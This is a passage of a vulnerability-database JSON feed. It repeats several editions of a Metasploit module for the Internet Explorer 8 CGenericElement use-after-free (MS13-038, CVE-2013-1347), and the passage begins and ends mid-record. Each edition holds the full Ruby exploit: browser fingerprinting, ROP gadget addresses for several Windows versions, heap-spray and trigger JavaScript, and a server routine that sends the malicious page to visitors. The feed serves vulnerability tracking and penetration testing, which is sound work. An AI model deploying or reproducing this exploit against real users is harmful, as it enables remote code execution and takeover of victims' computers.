"https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-01-04T17:56:36", "differentElements": ["modified", "published"], "edition": 11}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-03T08:05:03", "history": [], "viewCount": 60, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-03T08:05:03"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-03T08:05:03", "differentElements": ["modified", "published"], "edition": 12}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-03T10:05:37", "history": [], "viewCount": 60, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-03T10:05:37"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-03T10:05:37", "differentElements": ["modified", "published"], "edition": 13}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-06T20:15:02", "history": [], "viewCount": 60, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-06T20:15:02"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitReliability": "Good", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2018-02-06T20:15:02", "differentElements": ["modified", "published"], "edition": 14}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-02-06T22:15:07", "history": [], "viewCount": 60, "enchantments": {"score": {"value": 9.0, "modified": "2018-02-06T22:15:07"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n 